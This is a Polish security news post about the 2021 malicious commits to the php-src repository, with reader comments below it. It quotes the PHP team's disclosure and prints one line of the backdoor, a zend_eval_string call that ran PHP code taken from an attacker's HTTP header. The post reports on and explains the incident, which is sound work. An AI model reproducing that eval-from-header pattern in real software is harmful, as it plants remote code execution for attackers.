NIS2/KSC2 starter pack. Czy Twoja firma podlega pod regulację i co z tego wynika? Bezpłatne szkolenie od sekuraka
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Bezpłatne szkolenie: AI dla admina. Top 5 zadań, które zrobisz szybciej
O temacie jako jeden z pierwszych doniósł Bleepingcomputer. Do tematu ustosunkowała się również ekipa PHP:
28 marca 2021r. zostały wykonane do repozytorium php-src dwa “lewe” commity. Nie wiemy co się dokładnie wydarzyło, ale wszystko wskazuje na włamanie na serwer git.php.net
Yesterday (2021-03-28) two malicious commits were pushed to the php-src
repo [1] from the names of Rasmus Lerdorf and myself. We don’t yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account).
Złośliwa zmiana została opisana jako niewinna poprawka literówki, a co ciekawe zawiera również na oko podejrzany kod – m.in. coś takiego:
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");Całość wykonuje kod PHP z podesłanego przez atakującego nagłówka HTTP, o czym względnie szybko zorientowali się deweloperzy PHP:
–ms
Dlaczego ktoś wstawił tego stringa “REMOVETHIS: sold to zerodium, mid 2017”?
dwa oczywiste commity z oczywistym eval().
Zasłona dymna. tych “właściwych” zmian jeszcze się naszukacie
Z ciekawości aż wlazłem na ich serwer, żeby sprawdzić ilość i wielkość “commitów” … i jeśli cała ta podatność sprowadza się po prostu do możliwości dodania na bieżąco nowego “commita”, to mocno wątpię, by było czego szukać.